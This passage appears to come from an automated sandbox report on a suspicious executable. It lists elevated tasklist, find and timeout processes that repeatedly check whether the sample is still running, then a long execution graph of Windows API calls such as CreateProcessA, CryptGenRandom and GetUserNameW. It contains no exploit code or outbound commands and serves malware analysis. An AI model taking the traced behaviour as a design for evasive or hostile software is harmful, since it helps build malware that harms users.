                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:07:52:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:07:52:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:07:52:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:61
                                        Start time:07:52:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:07:52:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                          Execution Graph

                                          Execution Coverage:4.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:26.3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:36
109869->109946 109871->109865 109874 a77957 109951 a7769a 109874->109951 109875 a77940 109876 a74d66 _free 20 API calls 109875->109876 109878 a77948 109876->109878 109880 a74d66 _free 20 API calls 109878->109880 109883 a778fb 109880->109883 109881 a77991 109884 a74d66 _free 20 API calls 109881->109884 109882 a779b9 109885 a659a0 __dosmaperr 20 API calls 109882->109885 109883->109831 109886 a77999 109884->109886 109887 a779ca ListArray 109885->109887 109888 a74d66 _free 20 API calls 109886->109888 109890 a779db CreateProcessA 109887->109890 109889 a779a4 109888->109889 109891 a74d66 _free 20 API calls 109889->109891 109892 a77a3d 109890->109892 109893 a77a18 GetLastError 109890->109893 109891->109883 109895 a77afb 109892->109895 109896 a77a49 109892->109896 109955 a6597d 20 API calls 3 library calls 109893->109955 109956 a60f95 60 API calls _abort 109895->109956 109897 a77a83 109896->109897 109898 a77a4d WaitForSingleObject GetExitCodeProcess 109896->109898 109904 a77ac4 109897->109904 109905 a77a88 109897->109905 109901 a77a73 109898->109901 109902 a77a6c CloseHandle 109898->109902 109899 a77a24 109906 a77a30 109899->109906 109907 a77a29 CloseHandle 109899->109907 109908 a77a77 CloseHandle 109901->109908 109914 a77a7e 109901->109914 109902->109901 109903 a77b02 109909 a77acf 109904->109909 109910 a77ac8 CloseHandle 109904->109910 109911 a77a93 109905->109911 109912 a77a8c CloseHandle 109905->109912 109913 a77a34 CloseHandle 109906->109913 109906->109914 109907->109906 109908->109914 109915 a74d66 _free 20 API calls 109909->109915 109910->109909 109911->109914 109916 a77a97 CloseHandle 109911->109916 109912->109911 109913->109914 109917 a74d66 _free 20 API calls 109914->109917 109918 a77ad7 109915->109918 109916->109914 109919 a77aa8 109917->109919 109920 a74d66 _free 20 API calls 109918->109920 109921 a74d66 _free 20 API calls 109919->109921 109922 a77ae3 109920->109922 109923 a77ab4 109921->109923 109925 a74d66 _free 20 API calls 109922->109925 109924 a74d66 _free 
20 API calls 109923->109924 109924->109883 109925->109883 109926->109842 109928 a74d16 109927->109928 109929 a74d56 109928->109929 109930 a74d41 HeapAlloc 109928->109930 109935 a74d2a std::_Locinfo::_W_Getdays 109928->109935 109932 a659b3 __Stoulx 19 API calls 109929->109932 109931 a74d54 109930->109931 109930->109935 109933 a74d5b 109931->109933 109932->109933 109933->109836 109933->109837 109935->109929 109935->109930 109999 a6cfdd 7 API calls 2 library calls 109935->109999 109937 a76c05 109936->109937 109939 a76bf7 109936->109939 109938 a659b3 __Stoulx 20 API calls 109937->109938 109944 a76c0d 109938->109944 109939->109937 109941 a76c2e 109939->109941 109942 a76c17 109941->109942 109943 a659b3 __Stoulx 20 API calls 109941->109943 109942->109847 109942->109854 109943->109944 110000 a65122 26 API calls __wsopen_s 109944->110000 109945->109851 109957 a8205d 109946->109957 109949 a74d66 _free 20 API calls 109950 a77936 109949->109950 109950->109874 109950->109875 109975 a77649 109951->109975 109953 a776be 109953->109881 109953->109882 109954->109883 109955->109899 109956->109903 109958 a82079 109957->109958 109958->109958 109959 a74d09 __Getctype 20 API calls 109958->109959 109960 a820a7 109959->109960 109961 a820af 109960->109961 109962 a820c3 109960->109962 109973 a6597d 20 API calls 3 library calls 109961->109973 109965 a721c2 ___std_type_info_name 26 API calls 109962->109965 109969 a820bc 109962->109969 109970 a82118 109962->109970 109964 a820b6 109967 a659b3 __Stoulx 20 API calls 109964->109967 109965->109962 109966 a74d66 _free 20 API calls 109968 a8210e 109966->109968 109967->109969 109968->109949 109969->109966 109974 a6514f 11 API calls _abort 109970->109974 109972 a82124 109973->109964 109974->109972 109976 a77655 __FrameHandler3::FrameUnwindToState 109975->109976 109983 a6c20b EnterCriticalSection 109976->109983 109978 a77663 109984 a77b03 109978->109984 109982 a77681 __wsopen_s 109982->109953 109983->109978 109985 a77b2c 109984->109985 109986 a77b6a 
109985->109986 109987 a77b58 109985->109987 109989 a74d09 __Getctype 20 API calls 109986->109989 109988 a659b3 __Stoulx 20 API calls 109987->109988 109990 a77670 109988->109990 109991 a77b7e 109989->109991 109995 a7768e 109990->109995 109992 a659b3 __Stoulx 20 API calls 109991->109992 109994 a77b8c 109991->109994 109992->109994 109993 a74d66 _free 20 API calls 109993->109990 109994->109993 109998 a6c253 LeaveCriticalSection 109995->109998 109997 a77698 109997->109982 109998->109997 109999->109935 110000->109942 110001 a40daf 110002 a40dbb __FrameHandler3::FrameUnwindToState 110001->110002 110031 a40a3e 110002->110031 110004 a40f1b 110825 a41968 4 API calls 2 library calls 110004->110825 110006 a40dc2 110006->110004 110008 a40dec 110006->110008 110007 a40f22 110826 a60fe3 60 API calls _abort 110007->110826 110019 a40e2b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 110008->110019 110042 a70429 110008->110042 110010 a40f28 110827 a60f95 60 API calls _abort 110010->110827 110014 a40f30 110015 a40e0b 110017 a40e8c 110052 a6fe16 110017->110052 110019->110017 110821 a60fab 64 API calls 3 library calls 110019->110821 110021 a40e92 110056 9dc170 110021->110056 110025 a40eb3 110025->110007 110026 a40eb7 110025->110026 110027 a40ec0 110026->110027 110823 a60f86 60 API calls _abort 110026->110823 110824 a40bc4 13 API calls 2 library calls 110027->110824 110030 a40ec9 110030->110015 110032 a40a47 110031->110032 110828 a41105 IsProcessorFeaturePresent 110032->110828 110034 a40a53 110829 a5a1f6 10 API calls 3 library calls 110034->110829 110036 a40a58 110037 a40a5c 110036->110037 110830 a70309 110036->110830 110037->110006 110040 a40a73 110040->110006 110044 a70440 110042->110044 110043 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110045 a40e05 110043->110045 110044->110043 110045->110015 110046 a703cd 110045->110046 110047 a70418 110046->110047 110049 a703fc 
110046->110049 110048 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110047->110048 110050 a70425 110048->110050 110049->110047 110845 9b1960 110049->110845 110050->110019 110053 a6fe1f 110052->110053 110054 a6fe24 110052->110054 111014 a6fb5d 82 API calls 110053->111014 110054->110021 111015 a41740 110056->111015 110059 9dc1d4 110060 9e1800 collate 28 API calls 110059->110060 110062 9dc201 110060->110062 110061 9e1940 28 API calls 110061->110062 110062->110061 110063 9dc239 110062->110063 110064 9e1c10 _MREFOpen@16 28 API calls 110063->110064 110065 9dc24a 110064->110065 112263 9d68a0 326 API calls 11 library calls 110065->112263 110067 9dc24f 110068 9e1ac0 collate 26 API calls 110067->110068 110070 9dc264 110068->110070 110069 9dc415 110077 9de585 110069->110077 111020 9b8780 110069->111020 110073 9dc269 110070->110073 110072 9dc3fd SetErrorMode SetConsoleTitleW 111017 9c58e0 EnumWindows 110072->111017 110073->110069 110073->110072 110075 9dc510 111057 9c2870 110075->111057 110078 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110077->110078 110080 9de59f 110078->110080 110822 a41a87 GetModuleHandleW 110080->110822 110081 9dc432 110081->110075 111038 9e1360 110081->111038 110099 9dc4cf 110101 9e1ac0 collate 26 API calls 110099->110101 110103 9dc4de 110101->110103 110106 9b8780 97 API calls 110103->110106 110108 9dc4f6 110106->110108 110110 9e1ac0 collate 26 API calls 110108->110110 110112 9dc501 110110->110112 110114 9e1ac0 collate 26 API calls 110112->110114 110114->110075 110821->110017 110822->110025 110823->110027 110824->110030 110825->110007 110826->110010 110827->110014 110828->110034 110829->110036 110834 a7c98d 110830->110834 110833 a5a21f 8 API calls 3 library calls 110833->110037 110837 a7c9aa 110834->110837 110838 a7c9a6 110834->110838 110835 a405bb 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110836 a40a65 110835->110836 110836->110040 110836->110833 110837->110838 110840 a73b5d 110837->110840 110838->110835 110844 a73b64 110840->110844 110841 a73ba7 GetStdHandle 110841->110844 110842 a73c0f 110842->110837 110843 a73bba GetFileType 110843->110844 110844->110841 110844->110842 110844->110843 110852 a1e660 110845->110852 110847 9b198c 110861 a14900 110847->110861 110851 9b19b5 110851->110049 110884 9f4760 110852->110884 110854 a1e697 110907 a4089a 110854->110907 110857 9f4760 28 API calls 110858 a1e70b 110857->110858 110915 9e6670 110858->110915 110859 a1e725 ListArray 110859->110847 110862 a14942 110861->110862 110863 a1493e 110861->110863 111005 a17f30 24 API calls 4 library calls 110862->111005 110865 9f4760 28 API calls 110863->110865 110866 a14961 110865->110866 110974 a14230 CryptAcquireContextA 110866->110974 110868 a14970 110991 a147f0 110868->110991 110870 a1497c CryptGenRandom 110871 a149e4 110870->110871 110872 a1498a 110870->110872 110873 9e1bd0 _MREFOpen@16 28 API calls 110871->110873 110874 a1499c CryptReleaseContext 110872->110874 110878 a149a5 110872->110878 110875 a149f1 110873->110875 110874->110878 111006 a14390 30 API calls 4 library calls 110875->111006 110877 a14a01 111007 a57e0c RaiseException 110877->111007 110880 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110878->110880 110882 9b19ab 110880->110882 110881 a14a0f 110883 a40c27 29 API calls __onexit 110882->110883 110883->110851 110885 9f47b6 110884->110885 110889 9f4791 110884->110889 110886 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110885->110886 110887 9f47ce 110886->110887 110887->110854 110888 9f47ac 110888->110885 110891 9f4802 110888->110891 110889->110885 
110889->110888 110890 9f47d4 110889->110890 110927 9e1bd0 110890->110927 110892 9e1bd0 _MREFOpen@16 28 API calls 110891->110892 110895 9f480f 110892->110895 110933 9f4f50 28 API calls _MREFOpen@16 110895->110933 110898 9f47f4 110932 a57e0c RaiseException 110898->110932 110899 9f4822 110934 a57e0c RaiseException 110899->110934 110902 9f4830 110935 a57afd 27 API calls 2 library calls 110902->110935 110904 9f4887 110936 9e1c10 110904->110936 110906 9f48a9 110906->110854 110909 a4089f 110907->110909 110910 a1e6f1 110909->110910 110912 a408bb ListArray 110909->110912 110961 a6ac7c 110909->110961 110968 a6cfdd 7 API calls 2 library calls 110909->110968 110910->110857 110910->110859 110969 a57e0c RaiseException 110912->110969 110914 a41b6e 110916 9e66d1 110915->110916 110917 9e669f 110915->110917 110919 9e1bd0 _MREFOpen@16 28 API calls 110916->110919 110918 9e66a3 110917->110918 110971 a17ec0 30 API calls 3 library calls 110917->110971 110918->110859 110920 9e66de 110919->110920 110972 9b5930 28 API calls _MREFOpen@16 110920->110972 110923 9e66bd 110923->110859 110924 9e66f1 110973 a57e0c RaiseException 110924->110973 110926 9e66ff 110928 9e1bf0 110927->110928 110947 9e1800 110928->110947 110930 9e1c02 110931 9f4f50 28 API calls _MREFOpen@16 110930->110931 110931->110898 110932->110891 110933->110899 110934->110902 110935->110904 110937 9e1c36 110936->110937 110938 9e1c3d 110937->110938 110939 9e1c96 110937->110939 110940 9e1c73 110937->110940 110938->110906 110942 9e1c8b codecvt 110939->110942 110944 a4089a ListArray 22 API calls 110939->110944 110941 a4089a ListArray 22 API calls 110940->110941 110943 9e1c84 110941->110943 110942->110906 110943->110942 110945 a65132 messages 26 API calls 110943->110945 110944->110942 110946 9e1cd3 110945->110946 110950 9e181e SimpleUString::operator= 110947->110950 110952 9e1844 110947->110952 110948 9e192e 110960 9edba0 28 API calls SimpleUString::operator= 110948->110960 110950->110930 110952->110948 110953 9e18bd 110952->110953 
110954 9e1898 110952->110954 110956 a4089a ListArray 22 API calls 110953->110956 110959 9e18a9 codecvt 110953->110959 110955 a4089a ListArray 22 API calls 110954->110955 110955->110959 110956->110959 110957 a65132 messages 26 API calls 110957->110948 110958 9e1910 ctype 110958->110930 110959->110957 110959->110958 110966 a75b94 std::_Locinfo::_W_Getdays 110961->110966 110962 a75bd2 110964 a659b3 __Stoulx 20 API calls 110962->110964 110963 a75bbd RtlAllocateHeap 110965 a75bd0 110963->110965 110963->110966 110964->110965 110965->110909 110966->110962 110966->110963 110970 a6cfdd 7 API calls 2 library calls 110966->110970 110968->110909 110969->110914 110970->110966 110971->110923 110972->110924 110973->110926 110975 a142a6 110974->110975 110976 a1427b GetLastError CryptAcquireContextA 110974->110976 110978 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110975->110978 110976->110975 110977 a14295 CryptAcquireContextA 110976->110977 110977->110975 110979 a142c4 SetLastError 110977->110979 110980 a142c0 110978->110980 110981 9e1bd0 _MREFOpen@16 28 API calls 110979->110981 110980->110868 110982 a142d8 110981->110982 111008 a14390 30 API calls 4 library calls 110982->111008 110984 a142eb 111009 a57e0c RaiseException 110984->111009 110986 a142f9 111010 a57afd 27 API calls 2 library calls 110986->111010 110988 a14347 110989 9e1c10 _MREFOpen@16 28 API calls 110988->110989 110990 a14369 110989->110990 110990->110868 110992 a148b7 110991->110992 111001 a14835 110991->111001 111011 a4079a 5 API calls __Init_thread_wait 110992->111011 110994 a148c1 110994->111001 111012 a40c27 29 API calls __onexit 110994->111012 110995 a4089a ListArray 22 API calls 110996 a14845 110995->110996 110998 a14230 35 API calls 110996->110998 111002 a1485d 110996->111002 110998->111002 110999 a148e5 111013 a40750 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110999->111013 111001->110995 111003 
a14880 ctype 111001->111003 111002->111003 111004 a14877 CryptReleaseContext 111002->111004 111003->110870 111004->111003 111005->110863 111006->110877 111007->110881 111008->110984 111009->110986 111010->110988 111011->110994 111012->110999 111013->111001 111014->110054 111016 9dc18c GetConsoleWindow ShowWindow 111015->111016 111016->110059 111016->110073 111018 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111017->111018 111019 9c5912 111018->111019 111019->110069 111021 9b87e1 111020->111021 111022 9b87f8 111021->111022 111023 9b8863 111021->111023 111025 9e1800 collate 28 API calls 111022->111025 112434 a654b9 111023->112434 111033 9b8812 111025->111033 111026 9b88a8 112454 a64cff 111026->112454 111027 9b883c ctype 111028 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111027->111028 111030 9b885f 111028->111030 111030->110081 111032 9b8918 111034 a65132 messages 26 API calls 111032->111034 111033->111027 111033->111032 111036 9b891d 111034->111036 111035 9b8875 111035->111026 111037 a654b9 28 API calls 111035->111037 112449 9e1940 111035->112449 111037->111035 111039 9e13ae 111038->111039 111040 9e138a 111038->111040 112730 9e8080 28 API calls SimpleUString::operator= 111039->112730 111042 9e1800 collate 28 API calls 111040->111042 111044 9dc495 111042->111044 111043 9e13b3 111045 9e9040 111044->111045 111046 9e9050 111045->111046 111046->111046 112731 9ee160 111046->112731 111048 9dc4ab 111049 9e9580 111048->111049 111050 9e1940 28 API calls 111049->111050 111051 9dc4c1 111050->111051 111052 9e1ac0 111051->111052 111053 9e1acb 111052->111053 111054 9e1ae6 ctype 111052->111054 111053->111054 111055 a65132 messages 26 API calls 111053->111055 111054->110099 111056 9e1b0a 111055->111056 111058 9e1800 collate 28 API calls 111057->111058 111059 9c28c1 111058->111059 111060 9e1c10 
_MREFOpen@16 28 API calls 111059->111060 111061 9c28d7 111060->111061 112741 9c1bc0 111061->112741 111063 9c299f ctype 111064 9e1800 collate 28 API calls 111063->111064 111066 9c29ce 111064->111066 111065 9c30d0 111068 a65132 messages 26 API calls 111065->111068 111069 9e1c10 _MREFOpen@16 28 API calls 111066->111069 111067 9c28e9 ctype 111067->111063 111067->111065 111070 9c30f3 111068->111070 111071 9c29e4 111069->111071 111072 9c1bc0 30 API calls 111071->111072 111074 9c29f6 ctype 111072->111074 111073 9e1800 collate 28 API calls 111075 9c2adb 111073->111075 111074->111073 111076 9e1c10 _MREFOpen@16 28 API calls 111075->111076 111077 9c2af1 111076->111077 111078 9c1bc0 30 API calls 111077->111078 111081 9c2b03 ctype 111078->111081 111079 9ea4d0 28 API calls 111080 9c2bf5 111079->111080 111082 9e1800 collate 28 API calls 111080->111082 111081->111079 111083 9c2c21 111082->111083 111084 9e1c10 _MREFOpen@16 28 API calls 111083->111084 111085 9c2c33 111084->111085 111086 9c1bc0 30 API calls 111085->111086 111089 9c2c42 ctype 111086->111089 111087 9ea5b0 28 API calls 111088 9c2d13 111087->111088 112817 9e6c20 111088->112817 111089->111087 111091 9c2d30 111092 9ea4d0 28 API calls 111091->111092 111093 9c2d62 111092->111093 111094 9e1800 collate 28 API calls 111093->111094 111095 9c2d8b 111094->111095 111096 9e1c10 _MREFOpen@16 28 API calls 111095->111096 111097 9c2d9d 111096->111097 111098 9c1bc0 30 API calls 111097->111098 111101 9c2dac ctype 111098->111101 111099 9ea5b0 28 API calls 111100 9c2e7d 111099->111100 111102 9e6c20 SimpleUString::operator= 28 API calls 111100->111102 111101->111099 111103 9c2e9a 111102->111103 111104 9e1800 collate 28 API calls 111103->111104 111105 9c2ebf 111104->111105 111106 9e1c10 _MREFOpen@16 28 API calls 111105->111106 111107 9c2ed2 111106->111107 111108 9c1bc0 30 API calls 111107->111108 111110 9c2ee1 ctype 111108->111110 111109 a405bb 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111111 9c30cc GetModuleFileNameW 111109->111111 111110->111109 111112 9e1260 111111->111112 111113 9e1282 111112->111113 111114 9e6c20 SimpleUString::operator= 28 API calls 111113->111114 111115 9dc53b 111114->111115 111116 9c36f0 GetUserNameW 111115->111116 111117 9c3760 111116->111117 111118 9e6c20 SimpleUString::operator= 28 API calls 111117->111118 111119 9c3782 111118->111119 111120 9e6c20 SimpleUString::operator= 28 API calls 111119->111120 111121 9c37ae 111120->111121 111122 9ea4d0 28 API calls 111121->111122 111123 9c37e6 111122->111123 111124 9e1800 collate 28 API calls 111123->111124 111127 9c380f ctype 111124->111127 111125 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111126 9c38b5 111129 a65132 messages 26 API calls 111126->111129 111127->111126 111130 9c3892 ctype 111127->111130 111130->111125 112263->110067 112435 a653f4 __FrameHandler3::FrameUnwindToState 112434->112435 112436 a6540c 112435->112436 112438 a65438 112435->112438 112437 a659b3 __Stoulx 20 API calls 112436->112437 112439 a65411 112437->112439 112443 a6541c __wsopen_s 112438->112443 112485 a61afd EnterCriticalSection 112438->112485 112501 a65122 26 API calls __wsopen_s 112439->112501 112442 a6544b 112486 a642f5 112442->112486 112443->111035 112445 a6547e 112502 a654af LeaveCriticalSection __fread_nolock 112445->112502 112448 a65457 112448->112445 112494 a64e1a 112448->112494 112450 9e1950 112449->112450 112450->112450 112451 9e1967 SimpleUString::operator= 112450->112451 112505 9ebba0 28 API calls 5 library calls 112450->112505 112451->111035 112453 9e19a2 112453->111035 112455 a64d0b __FrameHandler3::FrameUnwindToState 112454->112455 112456 a64d31 112455->112456 112457 a64d19 112455->112457 112506 a6c20b EnterCriticalSection 112456->112506 112458 a659b3 __Stoulx 20 API 
calls 112457->112458 112460 a64d1e 112458->112460 112542 a65122 26 API calls __wsopen_s 112460->112542 112461 a64d3e 112507 a64c8c 112461->112507 112465 a64d50 112468 a659b3 __Stoulx 20 API calls 112465->112468 112466 a64d5d 112513 a61daa 112466->112513 112484 a64d55 112468->112484 112469 a64d63 112471 a659b3 __Stoulx 20 API calls 112469->112471 112470 a64d29 __wsopen_s 112470->111033 112473 a64d72 112471->112473 112474 a659b3 __Stoulx 20 API calls 112473->112474 112475 a64d79 112474->112475 112526 a76c52 112475->112526 112478 a64da6 112479 a659b3 __Stoulx 20 API calls 112478->112479 112479->112484 112480 a659b3 __Stoulx 20 API calls 112481 a64d98 112480->112481 112481->112478 112482 a64d9d 112481->112482 112483 a659b3 __Stoulx 20 API calls 112482->112483 112483->112484 112543 a64dca LeaveCriticalSection std::_Lockit::~_Lockit 112484->112543 112485->112442 112487 a64308 112486->112487 112493 a6436e 112486->112493 112488 a736a5 __fread_nolock 26 API calls 112487->112488 112489 a6430e 112488->112489 112490 a659b3 __Stoulx 20 API calls 112489->112490 112489->112493 112491 a64363 112490->112491 112503 a65122 26 API calls __wsopen_s 112491->112503 112493->112448 112495 a64dde 112494->112495 112496 a64dff __fread_nolock 112495->112496 112497 a659b3 __Stoulx 20 API calls 112495->112497 112496->112448 112498 a64def 112497->112498 112504 a65122 26 API calls __wsopen_s 112498->112504 112500 a64dfa 112500->112448 112501->112443 112502->112443 112503->112493 112504->112500 112505->112453 112506->112461 112509 a64cab 112507->112509 112508 a64cba 112508->112465 112508->112466 112509->112508 112544 a76866 29 API calls 3 library calls 112509->112544 112511 a64cd5 112512 a74d66 _free 20 API calls 112511->112512 112512->112508 112514 a61db6 __FrameHandler3::FrameUnwindToState 112513->112514 112515 a61dc7 112514->112515 112516 a61ddc 112514->112516 112517 a659b3 __Stoulx 20 API calls 112515->112517 112525 a61dd7 std::_Xfsopen __wsopen_s 112516->112525 112545 a61afd 
EnterCriticalSection 112516->112545 112518 a61dcc 112517->112518 112562 a65122 26 API calls __wsopen_s 112518->112562 112521 a61df8 112546 a61d34 112521->112546 112523 a61e03 112563 a61e20 LeaveCriticalSection __fread_nolock 112523->112563 112525->112469 112527 a76c65 112526->112527 112528 a76cdc 112527->112528 112529 a76c73 WaitForSingleObject 112527->112529 112530 a659b3 __Stoulx 20 API calls 112528->112530 112532 a76c7f GetExitCodeProcess 112529->112532 112533 a76c9b GetLastError 112529->112533 112531 a64d8c 112530->112531 112531->112478 112531->112480 112532->112533 112536 a76c8e 112532->112536 112534 a76ca6 112533->112534 112535 a76cbe 112533->112535 112537 a659b3 __Stoulx 20 API calls 112534->112537 112729 a6597d 20 API calls 3 library calls 112535->112729 112536->112531 112541 a76cd1 CloseHandle 112536->112541 112539 a76cab 112537->112539 112540 a659a0 __dosmaperr 20 API calls 112539->112540 112540->112536 112541->112531 112542->112470 112543->112470 112544->112511 112545->112521 112547 a61d41 112546->112547 112549 a61d56 112546->112549 112548 a659b3 __Stoulx 20 API calls 112547->112548 112550 a61d46 112548->112550 112554 a61d51 std::_Xfsopen 112549->112554 112564 a61b25 112549->112564 112589 a65122 26 API calls __wsopen_s 112550->112589 112554->112523 112557 a736a5 __fread_nolock 26 API calls 112558 a61d78 112557->112558 112574 a758de 112558->112574 112561 a74d66 _free 20 API calls 112561->112554 112562->112525 112563->112525 112565 a61b3d 112564->112565 112566 a61b39 112564->112566 112565->112566 112567 a736a5 __fread_nolock 26 API calls 112565->112567 112570 a74e40 112566->112570 112568 a61b5d 112567->112568 112590 a7553d 112568->112590 112571 a74e56 112570->112571 112572 a61d72 112570->112572 112571->112572 112573 a74d66 _free 20 API calls 112571->112573 112572->112557 112573->112572 112575 a75902 112574->112575 112576 a758ed 112574->112576 112577 a7593d 112575->112577 112581 a75929 112575->112581 112578 a659a0 __dosmaperr 20 API calls 112576->112578 
112579 a659a0 __dosmaperr 20 API calls 112577->112579 112580 a758f2 112578->112580 112582 a75942 112579->112582 112583 a659b3 __Stoulx 20 API calls 112580->112583 112712 a758b6 112581->112712 112585 a659b3 __Stoulx 20 API calls 112582->112585 112587 a61d7e 112583->112587 112586 a7594a 112585->112586 112715 a65122 26 API calls __wsopen_s 112586->112715 112587->112554 112587->112561 112589->112554 112591 a75549 __FrameHandler3::FrameUnwindToState 112590->112591 112592 a75551 112591->112592 112593 a75569 112591->112593 112595 a659a0 __dosmaperr 20 API calls 112592->112595 112594 a75607 112593->112594 112599 a7559e 112593->112599 112596 a659a0 __dosmaperr 20 API calls 112594->112596 112597 a75556 112595->112597 112598 a7560c 112596->112598 112600 a659b3 __Stoulx 20 API calls 112597->112600 112601 a659b3 __Stoulx 20 API calls 112598->112601 112615 a7cba4 EnterCriticalSection 112599->112615 112608 a7555e __wsopen_s 112600->112608 112603 a75614 112601->112603 112670 a65122 26 API calls __wsopen_s 112603->112670 112604 a755a4 112606 a755d5 112604->112606 112607 a755c0 112604->112607 112616 a75628 112606->112616 112609 a659b3 __Stoulx 20 API calls 112607->112609 112608->112566 112611 a755c5 112609->112611 112613 a659a0 __dosmaperr 20 API calls 112611->112613 112612 a755d0 112669 a755ff LeaveCriticalSection __wsopen_s 112612->112669 112613->112612 112615->112604 112617 a75656 112616->112617 112618 a7564f 112616->112618 112619 a7565a 112617->112619 112620 a75679 112617->112620 112621 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112618->112621 112622 a659a0 __dosmaperr 20 API calls 112619->112622 112623 a756ca 112620->112623 112624 a756ad 112620->112624 112625 a75830 112621->112625 112626 a7565f 112622->112626 112628 a756e0 112623->112628 112632 a78ff6 __fread_nolock 28 API calls 112623->112632 112627 a659a0 __dosmaperr 20 API calls 112624->112627 112625->112612 112629 a659b3 __Stoulx 20 
API calls 112626->112629 112631 a756b2 112627->112631 112671 a751cd 112628->112671 112633 a75666 112629->112633 112635 a659b3 __Stoulx 20 API calls 112631->112635 112632->112628 112685 a65122 26 API calls __wsopen_s 112633->112685 112639 a756ba 112635->112639 112637 a75727 112642 a75781 WriteFile 112637->112642 112643 a7573b 112637->112643 112638 a756ee 112640 a75714 112638->112640 112644 a756f2 112638->112644 112686 a65122 26 API calls __wsopen_s 112639->112686 112688 a74fad 71 API calls 3 library calls 112640->112688 112647 a757a4 GetLastError 112642->112647 112652 a7570a 112642->112652 112648 a75743 112643->112648 112649 a75771 112643->112649 112645 a757e8 112644->112645 112687 a75160 GetLastError WriteConsoleW CreateFileW __wsopen_s 112644->112687 112645->112618 112657 a659b3 __Stoulx 20 API calls 112645->112657 112647->112652 112653 a75761 112648->112653 112654 a75748 112648->112654 112678 a75243 112649->112678 112652->112618 112652->112645 112661 a757c4 112652->112661 112690 a75410 8 API calls 2 library calls 112653->112690 112654->112645 112655 a75751 112654->112655 112689 a75322 7 API calls 2 library calls 112655->112689 112660 a7580d 112657->112660 112659 a7575f 112659->112652 112662 a659a0 __dosmaperr 20 API calls 112660->112662 112663 a757df 112661->112663 112664 a757cb 112661->112664 112662->112618 112691 a6597d 20 API calls 3 library calls 112663->112691 112665 a659b3 __Stoulx 20 API calls 112664->112665 112667 a757d0 112665->112667 112668 a659a0 __dosmaperr 20 API calls 112667->112668 112668->112618 112669->112608 112670->112608 112672 a7fc47 __fread_nolock 26 API calls 112671->112672 112673 a751dd 112672->112673 112674 a751e2 112673->112674 112692 a7437a GetLastError 112673->112692 112674->112637 112674->112638 112676 a75205 112676->112674 112677 a75223 GetConsoleMode 112676->112677 112677->112674 112679 a75252 __wsopen_s 112678->112679 112680 a75305 112679->112680 112682 a752c4 WriteFile 